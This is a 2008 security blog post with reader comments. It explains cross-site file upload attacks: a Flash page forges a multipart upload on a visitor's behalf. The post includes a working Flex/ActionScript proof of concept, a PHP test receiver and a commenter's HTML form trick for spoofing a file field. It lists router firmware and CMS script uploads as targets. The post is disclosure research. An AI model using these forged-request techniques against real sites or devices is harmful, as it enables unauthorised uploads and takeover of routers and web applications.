Cross-site File Upload Attacks

Thu, 21 Feb 2008 12:15:32 GMT
by pdp

As you probably already know, CSRF attack are only possible when the attacked web application does not have an additional mechanism to ensure that requests towards it are genuine. In order to do that, the web developer must include a unique token for each request, which is validated on the server upon receiving a request. If the request value that represents the token matches the token that was generated for the request, then it is considered genuine and it should be left for additional processing. However, if both values do not match then the request is considered forged and as such should be disregarded.

Unfortunately, when it comes to file upload facilities, developers often forget to make such checks relying on the fact that file uploads are not spoofable, which in general is the correct assumption. However, when dealing with Web technologies, we often stumble across nasty surprises. The reason CSRF attacks against file uploads are not possible is because the HTML FORM specifications are not versatile enough to define sub-fields like filename="whatever.txt", which are vital parts of the multipart/form-data specifications when submitting files. This is the only restriction and I will show you that attackers can easily overcome it with a bit of help from Flash.

Cross-site File Uploads

We've already proved that various forms of home routers can be entirely compromised and hacked by forging UPnP requests with flash. Now I will show you that file uploading facilities can be attacked in a similar way. Let's examine the following code, which you can compile with Flex2 SDK - c:\Flex2\bin\mxmlc code.mxml:

<mx:Application xmlns:mx="" creationComplete="onAppInit()">
        /* by Petko D. Petkov; pdp
         * GNUCITIZEN

        private function onAppInit():void
            var r:URLRequest = new URLRequest('');

            r.method = 'POST';
   = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D%0A-----------------------------109092118919201--%0A');
            r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201';

            navigateToURL(r, '_self');

If you carefully read the content of the script you will notice that we are preparing an URLRequest object which we load with a POST method, a contentType which equals to multipart/form-data and a url-encoded data text. If we unencode the text we get the following result. Now let's have a look at it as well. Notice the filename="gc.txt" field:

Content-Disposition: form-data; name="file"; filename="gc.txt"
Content-Type: text/plain

Content-Disposition: form-data; name="submit"

Submit Query

This looks like a valid multipart/form-data file upload, doesn't it? If you compile and execute the code you will see that the file upload is completely valid and will upload a file called gc.txt with content of Hi from GNUCITIZEN!. But you can also use the following PHP script to verify the result if you feel skeptical about the whole concept.

<?php if ($_FILES['file']['error'] > 0): ?>
        <?php print_r($_FILES) ?>
<?php elseif (isset($_FILES['file'])): ?>
        <?php print_r($_FILES) ?>
        <?php echo file_get_contents($_FILES['file']['tmp_name']) ?>
<?php else: ?>
    <form method="post" enctype="multipart/form-data">
        <input type="file" name="file"/> 
        <input type="submit" name="submit"/>
<?php endif ?>

The Impact of Cross-site File Upload (CSFU) Attacks

Like CSRF attacks, there are plenty of things one can do with this type of technique. Here is a couple of evil things that come into my mind:

  • Upload a nasty picture on someone's profile - I admit this is not very useful but still very funny and open for abuse.
  • Upload a shiny new firmware to the router that is under attack by using the user as a proxy. This is pretty nasty and given the fact that there are numerous authentication bypass and A-to-C bugs floating around, it is very, very feasible.
  • Upload a shiny new configuration file on the router that is under attack. Same as the one above - very feasible and easy to perform.
  • Upload executable scripts on CMS - this of course is a bit more targeted..

Archived Comments

.mario reported that kuza55 has identified a similar problem which depends on a weird bug within Firefox, IE and Safari. Opera is not affected. Here is a demonstration of his code:
<form method="post" action="" enctype="multipart/form-data">
<textarea name='file"; filename="filename.ext
Content-Type: text/plain; '>Arbitrary File
<input type="submit" value='Send "File"' />
hmmm, very, very, interesting.
That's interesting. I've only played with the AS2 LoadVars Class (Since I've been to lazy to setup Flex, etc), so I thought you couldn't use Flash to do that since LoadVars URL encodes whatever you put in request body. Are there many differences between the LoadVars and URLRequest classes?
LoadVars is inferior when compared to URLRequest combined with navigateToURL or even better sendToURL. Simply put, the navigateToURL function will open the result into a browser window/tab while sendToURL will silently execute it in the background. No restrictions applied! btw, setting up flex environment is not very hard. you just need the FlexSDK .zip file. Decompress it somewhere on the disk. write your MXML or AS and compile with mxmlc like this:
path/to/flexsdk/bin/mxmlc path/to/app.mxml
Interesting project. "Like CSRF attacks, there are plenty of things one can do with this type of technique." - DOM XSS attack entry point. Using haXe with the Flex2 Framework
and how about spoofing the refe(f)rer with flash?
it used to work but not sure what is the situation right now.
Matt PressonMatt Presson
Just a thought here, but after doing some simple research on Flash and file access, an attacker could use "one of the wrapper programs that have been written to allow local file access (SWF Studio, Zinc, Screenweaver, etc)" (per along with the above code to create a drive-by file upload service. Especially if you used sendToURL(). If I understand what is presented on the above referenced page, and I may not, then if you could get anyone to visit your page you could upload any file you wished to your server from their local machine. Any thoughts? Am I crazy?
Routers and modems bypassed, now cross site file upload attacks. Good thing I stopped playing poker online for cash. I don't use this thing to bank or trade stock on either. Cheeky, aren't they. What is a n00b to do?
i want to upload file with a large size
this method should work although it could also fail from time to time.
it works great for webmail (yahoo/symantec & gmail). see screenshots of yahoo and gmail in .ppt presentation back in July ‘08 on
site eklesite ekle
Thank you for article. I took great pleasure to read
Thank you for article. I took great pleasure to read (: